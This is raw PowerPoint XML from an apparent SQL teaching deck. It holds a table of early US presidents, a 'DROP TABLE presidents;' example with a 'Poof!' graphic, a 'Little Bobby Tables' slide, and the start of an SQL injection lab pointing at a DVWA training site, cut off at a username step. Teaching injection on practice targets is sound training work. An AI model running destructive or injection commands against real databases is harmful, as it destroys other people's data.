                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1797</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3244139392"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Thomas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Jefferson</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Shadwell, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-13-1743</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1801</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3743850534"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Madison</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Port Conway, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-16-1751</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1809</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1713610808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe Hall, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-28-1758</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1817</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2522575697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219385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Structured Query Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DROP TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DROP TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>presidents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C8456B0-42BE-486E-AA49-CDF0F1DBABD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="860068495"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1313487" y="3423377"/>
          <a:ext cx="9589088" cy="2225040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{8799B23B-EC83-4686-B30A-512413B5E67A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1136301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3552698260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1481360">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1168334998"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1556201">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="164526466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2218864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="95918760"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1457510397"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623328670"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>num</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>firstname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>lastname</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hometown</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birthday</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>hiredate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2394002928"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</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George</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Washington</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Popes Creek, VA</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FEB-22-1732</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APR-30-1789</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1677156271"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</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John</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Adams</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Braintree, MA</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OCT-30-1735</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MAR-4-1797</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3244139392"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</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Thomas</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Jefferson</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Shadwell, VA</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APR-13-1743</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MAR-4-1801</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3743850534"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4</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James</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Madison</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Port Conway, VA</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MAR-16-1751</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MAR-4-1809</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1713610808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</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James</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Monroe</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Monroe Hall, VA</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APR-28-1758</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MAR-4-1817</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2522575697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Cloud 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFFBADA7-7998-4F5B-99B5-3AF16BEAA3C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21144773">
            <a:off x="3528107" y="3393825"/>
            <a:ext cx="4041451" cy="2518585"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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7200" b="1" dirty="0">
                <a:ln w="9525">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="12700" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Poof!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162595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KCD Strip">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD4126F-4948-4F9F-A3E9-4AB838D0B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69" y="1607419"/>
            <a:ext cx="10694462" cy="3291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495531-9F1F-490D-8AE4-26B91BD9207B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Little Bobby Tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21907740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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11415642" cy="489364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Open browser, go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://dvwa.example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="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username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
